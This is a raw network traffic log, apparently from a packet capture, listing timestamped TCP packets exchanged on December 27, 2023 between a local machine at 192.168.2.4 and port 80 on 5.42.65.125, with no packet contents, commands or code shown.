Dec 27, 2023 17:57:26.244424105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244465113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.244493008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244508028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244520903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244528055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.244535923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244556904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.244746923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244761944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244774103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244786978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244786978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.244801998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244811058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.244817972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244833946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244844913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.244847059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244863033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244874954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244874954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.244889021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244894981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.244919062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.244966030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244978905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245018959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.245043039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245057106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245069027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245083094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245098114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245100021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.245126009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.245335102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245384932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.245455980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245470047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245482922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245520115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245520115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.245556116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.245693922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245707989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245721102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245757103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.245774031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245788097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245800018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245809078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.245816946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245831013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245841980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.245845079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245870113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.245928049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245940924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245953083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245963097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.245966911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245980978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.245980978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.245996952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246009111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246022940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246028900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246037960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246042967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246052027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246068954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246180058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246193886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246222973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246249914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246283054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246467113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246479988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246504068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246522903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246577978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246591091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246602058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246613979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246623993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246627092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246640921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246654034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246654034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246668100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246670008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246695042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246697903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246735096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246797085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246810913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246823072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246838093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246843100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246850967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246865034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246874094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246879101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246891975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246897936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246906042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246918917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246925116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.246933937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.246953011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.247275114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247289896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247320890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247323990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.247354031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.247395039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247407913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247421026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247433901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247448921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247463942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.247488022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.247488976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247503042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247515917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247524977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.247529030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247541904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247553110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.247554064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247570038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247581959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.247612953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.247699976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247714043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247725964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247737885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247746944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.247750998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247765064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247775078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.247777939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247802973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247811079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.247822046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.247859955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.248224020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248238087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248260021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.248322010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248347998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248358965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.248362064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248378992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248403072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248414040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.248418093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248431921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248439074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.248446941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248469114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.248482943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248496056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248507023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248533964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.248553038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.248580933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248982906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.248997927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249033928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249037027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249053001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249066114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249073029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249079943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249092102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249104023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249105930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249121904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249128103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249135971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249161959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249185085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249197960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249221087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249231100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249263048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249273062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249286890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249331951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249356985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249372959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249383926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249397993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249408960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249413013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249427080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249429941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249445915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249459028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249470949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249484062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249492884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249496937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249507904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249512911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249524117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249550104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249557972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249572039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249583006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249594927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249605894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249605894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249618053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249629974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249629974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249641895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249654055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.249660969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.249687910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250394106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250407934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250420094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250432014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250437975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250444889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250464916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250477076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250478029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250493050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250499964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250504971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250518084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250523090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250543118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250601053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250612974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250623941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250636101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250649929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250650883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250664949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250669956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250677109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250690937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250690937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250705004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250713110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250720978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250734091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250745058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250750065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250758886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250771046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250778913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250782013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250794888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.250798941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.250818014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.251416922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251430035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251441002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251452923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251467943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.251491070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.251579046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251590967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251597881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251604080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251610994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251624107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251641035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251653910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251666069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251677990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.251682043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251696110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251708984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251714945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.251722097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251733065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251744986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251745939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.251760960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.251780987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.251816988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251830101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251840115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251853943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251867056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.251868963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.251894951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252147913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252166033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252182007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252299070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252311945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252334118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252355099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252370119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252389908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252393961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252427101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252540112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252552032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252563000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252573967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252585888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252588987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252599001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252610922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252613068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252626896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252635002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252641916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252655983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252661943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252671957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252702951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252706051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252724886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252736092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252747059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252759933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252760887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252774000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252780914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252788067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252798080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.252799988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.252820015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.253176928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253190994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253201962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253213882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253226042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.253231049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253257990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.253268957 CET	49738	80	192.168.2.4	5.42.65.125
